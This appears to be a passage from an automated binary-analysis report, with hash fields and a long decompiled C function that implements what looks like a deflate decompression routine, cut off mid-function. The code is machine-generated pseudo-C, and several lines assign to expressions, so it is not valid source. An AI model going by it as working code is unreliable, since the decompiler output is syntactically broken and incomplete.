                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                            • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E00406D85(signed int __ebx, signed int* __esi) {
                            				signed int _t396;
                            				signed int _t425;
                            				signed int _t442;
                            				signed int _t443;
                            				signed int* _t446;
                            				void* _t448;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t446 = __esi;
                            					_t425 = __ebx;
                            					if( *(_t448 - 0x34) == 0) {
                            						break;
                            					}
                            					L55:
                            					__eax =  *(__ebp - 0x38);
                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            					__ecx = __ebx;
                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            					__ebx = __ebx + 8;
                            					while(1) {
                            						L56:
                            						if(__ebx < 0xe) {
                            							goto L0;
                            						}
                            						L57:
                            						__eax =  *(__ebp - 0x40);
                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                            						__ecx = __eax;
                            						__esi[1] = __eax;
                            						__ecx = __eax & 0x0000001f;
                            						if(__cl > 0x1d) {
                            							L9:
                            							_t443 = _t442 | 0xffffffff;
                            							 *_t446 = 0x11;
                            							L10:
                            							_t446[0x147] =  *(_t448 - 0x40);
                            							_t446[0x146] = _t425;
                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                            							L11:
                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                            							_t446[0x26ea] =  *(_t448 - 0x30);
                            							E004074F4( *(_t448 + 8));
                            							return _t443;
                            						}
                            						L58:
                            						__eax = __eax & 0x000003e0;
                            						if(__eax > 0x3a0) {
                            							goto L9;
                            						}
                            						L59:
                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                            						__ebx = __ebx - 0xe;
                            						_t94 =  &(__esi[2]);
                            						 *_t94 = __esi[2] & 0x00000000;
                            						 *__esi = 0xc;
                            						while(1) {
                            							L60:
                            							__esi[1] = __esi[1] >> 0xa;
                            							__eax = (__esi[1] >> 0xa) + 4;
                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                            								goto L68;
                            							}
                            							L61:
                            							while(1) {
                            								L64:
                            								if(__ebx >= 3) {
                            									break;
                            								}
                            								L62:
                            								if( *(__ebp - 0x34) == 0) {
                            									goto L182;
                            								}
                            								L63:
                            								__eax =  *(__ebp - 0x38);
                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            								__ecx = __ebx;
                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            								__ebx = __ebx + 8;
                            							}
                            							L65:
                            							__ecx = __esi[2];
                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                            							__ebx = __ebx - 3;
                            							_t108 = __ecx + 0x4084d4; // 0x121110
                            							__ecx =  *_t108;
                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                            							__ecx = __esi[1];
                            							__esi[2] = __esi[2] + 1;
                            							__eax = __esi[2];
                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                            								goto L64;
                            							}
                            							L66:
                            							while(1) {
                            								L68:
                            								if(__esi[2] >= 0x13) {
                            									break;
                            								}
                            								L67:
                            								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                            								__eax =  *_t119;
                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                            								_t126 =  &(__esi[2]);
                            								 *_t126 = __esi[2] + 1;
                            							}
                            							L69:
                            							__ecx = __ebp - 8;
                            							__edi =  &(__esi[0x143]);
                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                            							__eax = 0;
                            							 *(__ebp - 8) = 0;
                            							__eax =  &(__esi[3]);
                            							 *__edi = 7;
                            							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                            							if(__eax != 0) {
                            								L72:
                            								 *__esi = 0x11;
                            								while(1) {
                            									L180:
                            									_t396 =  *_t446;
                            									if(_t396 > 0xf) {
                            										break;
                            									}
                            									L1:
                            									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                            										case 0:
                            											L101:
                            											__eax = __esi[4] & 0x000000ff;
                            											__esi[3] = __esi[4] & 0x000000ff;
                            											__eax = __esi[5];
                            											__esi[2] = __esi[5];
                            											 *__esi = 1;
                            											goto L102;
                            										case 1:
                            											L102:
                            											__eax = __esi[3];
                            											while(1) {
                            												L105:
                            												__eflags = __ebx - __eax;
                            												if(__ebx >= __eax) {
                            													break;
                            												}
                            												L103:
                            												__eflags =  *(__ebp - 0x34);
                            												if( *(__ebp - 0x34) == 0) {
                            													goto L182;
                            												}
                            												L104:
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                            												__ecx = __ebx;
                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            												__ebx = __ebx + 8;
                            												__eflags = __ebx;
                            											}
                            											L106:
                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                            											__eax = __eax &  *(__ebp - 0x40);
                            											__ecx = __esi[2];
                            											__eax = __esi[2] + __eax * 4;
                            											__ecx =  *(__eax + 1) & 0x000000ff;
                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                            											__ecx =  *__eax & 0x000000ff;
                            											__eflags = __ecx;
                            											if(__ecx != 0) {
                            												L108:
                            												__eflags = __cl & 0x00000010;
                            												if((__cl & 0x00000010) == 0) {
                            													L110:
                            													__eflags = __cl & 0x00000040;
                            													if((__cl & 0x00000040) == 0) {
                            														goto L125;
                            													}
                            													L111:
                            													__eflags = __cl & 0x00000020;
                            													if((__cl & 0x00000020) == 0) {
                            														goto L9;
                            													}
                            													L112:
                            													 *__esi = 7;
                            													goto L180;
                            												}
                            												L109:
                            												__esi[2] = __ecx;
                            												__esi[1] = __eax;
                            												 *__esi = 2;
                            												goto L180;
                            											}
                            											L107:
                            											__esi[2] = __eax;
                            											 *__esi = 6;
                            											goto L180;
                            										case 2:
                            											L113:
                            											__eax = __esi[2];
                            											while(1) {
                            												L116:
                            												__eflags = __ebx - __eax;
                            												if(__ebx >= __eax) {
                            													break;
                            												}
                            												L114:
                            												__eflags =  *(__ebp - 0x34);
                            												if( *(__ebp - 0x34) == 0) {
                            													goto L182;
                            												}
                            												L115:
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                            												__ecx = __ebx;
                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            												__ebx = __ebx + 8;
                            												__eflags = __ebx;
                            											}
                            											L117:
                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                            											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                            											__ecx = __eax;
                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            											__ebx = __ebx - __eax;
                            											__eflags = __ebx;
                            											__eax = __esi[4] & 0x000000ff;
                            											__esi[3] = __esi[4] & 0x000000ff;
                            											__eax = __esi[6];
                            											__esi[2] = __esi[6];
                            											 *__esi = 3;
                            											goto L118;
                            										case 3:
                            											L118:
                            											__eax = __esi[3];
                            											while(1) {
                            												L121:
                            												__eflags = __ebx - __eax;
                            												if(__ebx >= __eax) {
                            													break;
                            												}
                            												L119:
                            												__eflags =  *(__ebp - 0x34);
                            												if( *(__ebp - 0x34) == 0) {
                            													goto L182;
                            												}
                            												L120:
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                            												__ecx = __ebx;
                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            												__ebx = __ebx + 8;
                            												__eflags = __ebx;
                            											}
                            											L122:
                            											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                            											__eax = __eax &  *(__ebp - 0x40);
                            											__ecx = __esi[2];
                            											__eax = __esi[2] + __eax * 4;
                            											__ecx =  *(__eax + 1) & 0x000000ff;
                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                            											__ecx =  *__eax & 0x000000ff;
                            											__eflags = __cl & 0x00000010;
                            											if((__cl & 0x00000010) == 0) {
                            												L124:
                            												__eflags = __cl & 0x00000040;
                            												if((__cl & 0x00000040) != 0) {
                            													goto L9;
                            												}
                            												L125:
                            												__esi[3] = __ecx;
                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                            												__esi[2] = __eax;
                            												goto L180;
                            											}
                            											L123:
                            											__esi[2] = __ecx;
                            											__esi[3] = __eax;
                            											 *__esi = 4;
                            											goto L180;
                            										case 4:
                            											L126:
                            											__eax = __esi[2];
                            											while(1) {
                            												L129:
                            												__eflags = __ebx - __eax;
                            												if(__ebx >= __eax) {
                            													break;
                            												}
                            												L127:
                            												__eflags =  *(__ebp - 0x34);
                            												if( *(__ebp - 0x34) == 0) {
                            													goto L182;
                            												}
                            												L128:
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                            												__ecx = __ebx;
                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            												__ebx = __ebx + 8;
                            												__eflags = __ebx;
                            											}
                            											L130:
                            											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                            											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                            											__ecx = __eax;
                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            											__ebx = __ebx - __eax;
                            											__eflags = __ebx;
                            											 *__esi = 5;
                            											goto L131;
                            										case 5:
                            											L131:
                            											__eax =  *(__ebp - 0x30);
                            											__edx = __esi[3];
                            											__eax = __eax - __esi;
                            											__ecx = __eax - __esi - 0x1ba0;
                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                            												__ecx = __eax;
                            												__ecx = __eax - __edx;
                            												__eflags = __ecx;
                            											} else {
                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                            												__ecx = __esi[0x26e8] - __edx - __esi;
                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                            											}
                            											__eflags = __esi[1];
                            											 *(__ebp - 0x20) = __ecx;
                            											if(__esi[1] != 0) {
                            												L135:
                            												__edi =  *(__ebp - 0x2c);
                            												do {
                            													L136:
                            													__eflags = __edi;
                            													if(__edi != 0) {
                            														goto L152;
                            													}
                            													L137:
                            													__edi = __esi[0x26e8];
                            													__eflags = __eax - __edi;
                            													if(__eax != __edi) {
                            														L143:
                            														__esi[0x26ea] = __eax;
                            														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                            														__eax = __esi[0x26ea];
                            														__ecx = __esi[0x26e9];
                            														__eflags = __eax - __ecx;
                            														 *(__ebp - 0x30) = __eax;
                            														if(__eax >= __ecx) {
                            															__edi = __esi[0x26e8];
                            															__edi = __esi[0x26e8] - __eax;
                            															__eflags = __edi;
                            														} else {
                            															__ecx = __ecx - __eax;
                            															__edi = __ecx - __eax - 1;
                            														}
                            														__edx = __esi[0x26e8];
                            														__eflags = __eax - __edx;
                            														 *(__ebp - 8) = __edx;
                            														if(__eax == __edx) {
                            															__edx =  &(__esi[0x6e8]);
                            															__eflags = __ecx - __edx;
                            															if(__ecx != __edx) {
                            																__eax = __edx;
                            																__eflags = __eax - __ecx;
                            																 *(__ebp - 0x30) = __eax;
                            																if(__eax >= __ecx) {
                            																	__edi =  *(__ebp - 8);
                            																	__edi =  *(__ebp - 8) - __eax;
                            																	__eflags = __edi;
                            																} else {
                            																	__ecx = __ecx - __eax;
                            																	__edi = __ecx;
                            																}
                            															}
                            														}
                            														__eflags = __edi;
                            														if(__edi == 0) {
                            															goto L183;
                            														} else {
                            															goto L152;
                            														}
                            													}
                            													L138:
                            													__ecx = __esi[0x26e9];
                            													__edx =  &(__esi[0x6e8]);
                            													__eflags = __ecx - __edx;
                            													if(__ecx == __edx) {
                            														goto L143;
                            													}
                            													L139:
                            													__eax = __edx;
                            													__eflags = __eax - __ecx;
                            													if(__eax >= __ecx) {
                            														__edi = __edi - __eax;
                            														__eflags = __edi;
                            													} else {
                            														__ecx = __ecx - __eax;
                            														__edi = __ecx;
                            													}
                            													__eflags = __edi;
                            													if(__edi == 0) {
                            														goto L143;
                            													}
                            													L152:
                            													__ecx =  *(__ebp - 0x20);
                            													 *__eax =  *__ecx;
                            													__eax = __eax + 1;
                            													__ecx = __ecx + 1;
                            													__edi = __edi - 1;
                            													__eflags = __ecx - __esi[0x26e8];
                            													 *(__ebp - 0x30) = __eax;
                            													 *(__ebp - 0x20) = __ecx;
                            													 *(__ebp - 0x2c) = __edi;
                            													if(__ecx == __esi[0x26e8]) {
                            														__ecx =  &(__esi[0x6e8]);
                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                            													}
                            													_t357 =  &(__esi[1]);
                            													 *_t357 = __esi[1] - 1;
                            													__eflags =  *_t357;
                            												} while ( *_t357 != 0);
                            											}
                            											goto L23;
                            										case 6:
                            											L156:
                            											__eax =  *(__ebp - 0x2c);
                            											__edi =  *(__ebp - 0x30);
                            											__eflags = __eax;
                            											if(__eax != 0) {
                            												L172:
                            												__cl = __esi[2];
                            												 *__edi = __cl;
                            												__edi = __edi + 1;
                            												__eax = __eax - 1;
                            												 *(__ebp - 0x30) = __edi;
                            												 *(__ebp - 0x2c) = __eax;
                            												goto L23;
                            											}
                            											L157:
                            											__ecx = __esi[0x26e8];
                            											__eflags = __edi - __ecx;
                            											if(__edi != __ecx) {
                            												L163:
                            												__esi[0x26ea] = __edi;
                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                            												__edi = __esi[0x26ea];
                            												__ecx = __esi[0x26e9];
                            												__eflags = __edi - __ecx;
                            												 *(__ebp - 0x30) = __edi;
                            												if(__edi >= __ecx) {
                            													__eax = __esi[0x26e8];
                            													__eax = __esi[0x26e8] - __edi;
                            													__eflags = __eax;
                            												} else {
                            													__ecx = __ecx - __edi;
                            													__eax = __ecx - __edi - 1;
                            												}
                            												__edx = __esi[0x26e8];
                            												__eflags = __edi - __edx;
                            												 *(__ebp - 8) = __edx;
                            												if(__edi == __edx) {
                            													__edx =  &(__esi[0x6e8]);
                            													__eflags = __ecx - __edx;
                            													if(__ecx != __edx) {
                            														__edi = __edx;
                            														__eflags = __edi - __ecx;
                            														 *(__ebp - 0x30) = __edi;
                            														if(__edi >= __ecx) {
                            															__eax =  *(__ebp - 8);
                            															__eax =  *(__ebp - 8) - __edi;
                            															__eflags = __eax;
                            														} else {
                            															__ecx = __ecx - __edi;
                            															__eax = __ecx;
                            														}
                            													}
                            												}
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													goto L183;
                            												} else {
                            													goto L172;
                            												}
                            											}
                            											L158:
                            											__eax = __esi[0x26e9];
                            											__edx =  &(__esi[0x6e8]);
                            											__eflags = __eax - __edx;
                            											if(__eax == __edx) {
                            												goto L163;
                            											}
                            											L159:
                            											__edi = __edx;
                            											__eflags = __edi - __eax;
                            											if(__edi >= __eax) {
                            												__ecx = __ecx - __edi;
                            												__eflags = __ecx;
                            												__eax = __ecx;
                            											} else {
                            												__eax = __eax - __edi;
                            												__eax = __eax - 1;
                            											}
                            											__eflags = __eax;
                            											if(__eax != 0) {
                            												goto L172;
                            											} else {
                            												goto L163;
                            											}
                            										case 7:
                            											L173:
                            											__eflags = __ebx - 7;
                            											if(__ebx > 7) {
                            												__ebx = __ebx - 8;
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                            												_t380 = __ebp - 0x38;
                            												 *_t380 =  *(__ebp - 0x38) - 1;
                            												__eflags =  *_t380;
                            											}
                            											goto L175;
                            										case 8:
                            											L4:
                            											while(_t425 < 3) {
                            												if( *(_t448 - 0x34) == 0) {
                            													goto L182;
                            												} else {
                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                            													_t425 = _t425 + 8;
                            													continue;
                            												}
                            											}
                            											_t425 = _t425 - 3;
                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                            											asm("sbb ecx, ecx");
                            											_t408 = _t406 >> 1;
                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                            											if(_t408 == 0) {
                            												L24:
                            												 *_t446 = 9;
                            												_t436 = _t425 & 0x00000007;
                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                            												_t425 = _t425 - _t436;
                            												goto L180;
                            											}
                            											L6:
                            											_t411 = _t408 - 1;
                            											if(_t411 == 0) {
                            												L13:
                            												__eflags =  *0x432e90;
                            												if( *0x432e90 != 0) {
                            													L22:
                            													_t412 =  *0x40a5e8; // 0x9
                            													_t446[4] = _t412;
                            													_t413 =  *0x40a5ec; // 0x5
                            													_t446[4] = _t413;
                            													_t414 =  *0x431d0c; // 0x0
                            													_t446[5] = _t414;
                            													_t415 =  *0x431d08; // 0x0
                            													_t446[6] = _t415;
                            													L23:
                            													 *_t446 =  *_t446 & 0x00000000;
                            													goto L180;
                            												} else {
                            													_t26 = _t448 - 8;
                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                            													__eflags =  *_t26;
                            													_t416 = 0x431d10;
                            													goto L15;
                            													L20:
                            													 *_t416 = _t438;
                            													_t416 = _t416 + 4;
                            													__eflags = _t416 - 0x432190;
                            													if(_t416 < 0x432190) {
                            														L15:
                            														__eflags = _t416 - 0x431f4c;
                            														_t438 = 8;
                            														if(_t416 > 0x431f4c) {
                            															__eflags = _t416 - 0x432110;
                            															if(_t416 >= 0x432110) {
                            																__eflags = _t416 - 0x432170;
                            																if(_t416 < 0x432170) {
                            																	_t438 = 7;
                            																}
                            															} else {
                            																_t438 = 9;
                            															}
                            														}
                            														goto L20;
                            													} else {
                            														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                            														_push(0x1e);
                            														_pop(_t440);
                            														_push(5);
                            														_pop(_t419);
                            														memset(0x431d10, _t419, _t440 << 2);
                            														_t450 = _t450 + 0xc;
                            														_t442 = 0x431d10 + _t440;
                            														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                            														 *0x432e90 =  *0x432e90 + 1;
                            														__eflags =  *0x432e90;
                            														goto L22;
                            													}
                            												}
                            											}
                            											L7:
                            											_t423 = _t411 - 1;
                            											if(_t423 == 0) {
                            												 *_t446 = 0xb;
                            												goto L180;
                            											}
                            											L8:
                            											if(_t423 != 1) {
                            												goto L180;
                            											}
                            											goto L9;
                            										case 9:
                            											while(1) {
                            												L27:
                            												__eflags = __ebx - 0x20;
                            												if(__ebx >= 0x20) {
                            													break;
                            												}
                            												L25:
                            												__eflags =  *(__ebp - 0x34);
                            												if( *(__ebp - 0x34) == 0) {
                            													goto L182;
                            												}
                            												L26:
                            												__eax =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            												__ecx = __ebx;
                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            												__ebx = __ebx + 8;
                            												__eflags = __ebx;
                            											}
                            											L28:
                            											__eax =  *(__ebp - 0x40);
                            											__ebx = 0;
                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                            											 *(__ebp - 0x40) = 0;
                            											__eflags = __eax;
                            											__esi[1] = __eax;
                            											if(__eax == 0) {
                            												goto L53;
                            											}
                            											L29:
                            											_push(0xa);
                            											_pop(__eax);
                            											goto L54;
                            										case 0xa:
                            											L30:
                            											__eflags =  *(__ebp - 0x34);
                            											if( *(__ebp - 0x34) == 0) {
                            												goto L182;
                            											}
                            											L31:
                            											__eax =  *(__ebp - 0x2c);
                            											__eflags = __eax;
                            											if(__eax != 0) {
                            												L48:
                            												__eflags = __eax -  *(__ebp - 0x34);
                            												if(__eax >=  *(__ebp - 0x34)) {
                            													__eax =  *(__ebp - 0x34);
                            												}
                            												__ecx = __esi[1];
                            												__eflags = __ecx - __eax;
                            												__edi = __ecx;
                            												if(__ecx >= __eax) {
                            													__edi = __eax;
                            												}
                            												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                            												_t80 =  &(__esi[1]);
                            												 *_t80 = __esi[1] - __edi;
                            												__eflags =  *_t80;
                            												if( *_t80 == 0) {
                            													L53:
                            													__eax = __esi[0x145];
                            													L54:
                            													 *__esi = __eax;
                            												}
                            												goto L180;
                            											}
                            											L32:
                            											__ecx = __esi[0x26e8];
                            											__edx =  *(__ebp - 0x30);
                            											__eflags = __edx - __ecx;
                            											if(__edx != __ecx) {
                            												L38:
                            												__esi[0x26ea] = __edx;
                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                            												__edx = __esi[0x26ea];
                            												__ecx = __esi[0x26e9];
                            												__eflags = __edx - __ecx;
                            												 *(__ebp - 0x30) = __edx;
                            												if(__edx >= __ecx) {
                            													__eax = __esi[0x26e8];
                            													__eax = __esi[0x26e8] - __edx;
                            													__eflags = __eax;
                            												} else {
                            													__ecx = __ecx - __edx;
                            													__eax = __ecx - __edx - 1;
                            												}
                            												__edi = __esi[0x26e8];
                            												 *(__ebp - 0x2c) = __eax;
                            												__eflags = __edx - __edi;
                            												if(__edx == __edi) {
                            													__edx =  &(__esi[0x6e8]);
                            													__eflags = __edx - __ecx;
                            													if(__eflags != 0) {
                            														 *(__ebp - 0x30) = __edx;
                            														if(__eflags >= 0) {
                            															__edi = __edi - __edx;
                            															__eflags = __edi;
                            															__eax = __edi;
                            														} else {
                            															__ecx = __ecx - __edx;
                            															__eax = __ecx;
                            														}
                            														 *(__ebp - 0x2c) = __eax;
                            													}
                            												}
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													goto L183;
                            												} else {
                            													goto L48;
                            												}
                            											}
                            											L33:
                            											__eax = __esi[0x26e9];
                            											__edi =  &(__esi[0x6e8]);
                            											__eflags = __eax - __edi;
                            											if(__eax == __edi) {
                            												goto L38;
                            											}
                            											L34:
                            											__edx = __edi;
                            											__eflags = __edx - __eax;
                            											 *(__ebp - 0x30) = __edx;
                            											if(__edx >= __eax) {
                            												__ecx = __ecx - __edx;
                            												__eflags = __ecx;
                            												__eax = __ecx;
                            											} else {
                            												__eax = __eax - __edx;
                            												__eax = __eax - 1;
                            											}
                            											__eflags = __eax;
                            											 *(__ebp - 0x2c) = __eax;
                            											if(__eax != 0) {
                            												goto L48;
                            											} else {
                            												goto L38;
                            											}
                            										case 0xb:
                            											goto L56;
                            										case 0xc:
                            											L60:
                            											__esi[1] = __esi[1] >> 0xa;
                            											__eax = (__esi[1] >> 0xa) + 4;
                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                            												goto L68;
                            											}
                            											goto L61;
                            										case 0xd:
                            											while(1) {
                            												L93:
                            												__eax = __esi[1];
                            												__ecx = __esi[2];
                            												__edx = __eax;
                            												__eax = __eax & 0x0000001f;
                            												__edx = __edx >> 5;
                            												__eax = __edx + __eax + 0x102;
                            												__eflags = __esi[2] - __eax;
                            												if(__esi[2] >= __eax) {
                            													break;
                            												}
                            												L73:
                            												__eax = __esi[0x143];
                            												while(1) {
                            													L76:
                            													__eflags = __ebx - __eax;
                            													if(__ebx >= __eax) {
                            														break;
                            													}
                            													L74:
                            													__eflags =  *(__ebp - 0x34);
                            													if( *(__ebp - 0x34) == 0) {
                            														goto L182;
                            													}
                            													L75:
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                            													__ecx = __ebx;
                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            													__ebx = __ebx + 8;
                            													__eflags = __ebx;
                            												}
                            												L77:
                            												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                            												__eax = __eax &  *(__ebp - 0x40);
                            												__ecx = __esi[0x144];
                            												__eax = __esi[0x144] + __eax * 4;
                            												__edx =  *(__eax + 1) & 0x000000ff;
                            												__eax =  *(__eax + 2) & 0x0000ffff;
                            												__eflags = __eax - 0x10;
                            												 *(__ebp - 0x14) = __eax;
                            												if(__eax >= 0x10) {
                            													L79:
                            													__eflags = __eax - 0x12;
                            													if(__eax != 0x12) {
                            														__eax = __eax + 0xfffffff2;
                            														 *(__ebp - 8) = 3;
                            													} else {
                            														_push(7);
                            														 *(__ebp - 8) = 0xb;
                            														_pop(__eax);
                            													}
                            													while(1) {
                            														L84:
                            														__ecx = __eax + __edx;
                            														__eflags = __ebx - __eax + __edx;
                            														if(__ebx >= __eax + __edx) {
                            															break;
                            														}
                            														L82:
                            														__eflags =  *(__ebp - 0x34);
                            														if( *(__ebp - 0x34) == 0) {
                            															goto L182;
                            														}
                            														L83:
                            														__ecx =  *(__ebp - 0x38);
                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                            														__ecx = __ebx;
                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                            														__ebx = __ebx + 8;
                            														__eflags = __ebx;
                            													}
                            													L85:
                            													__ecx = __edx;
                            													__ebx = __ebx - __edx;
                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                            													__edx =  *(__ebp - 8);
                            													__ebx = __ebx - __eax;
                            													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                            													__ecx = __eax;
                            													__eax = __esi[1];
                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            													__ecx = __esi[2];
                            													__eax = __eax >> 5;
                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                            													__eax = __eax & 0x0000001f;
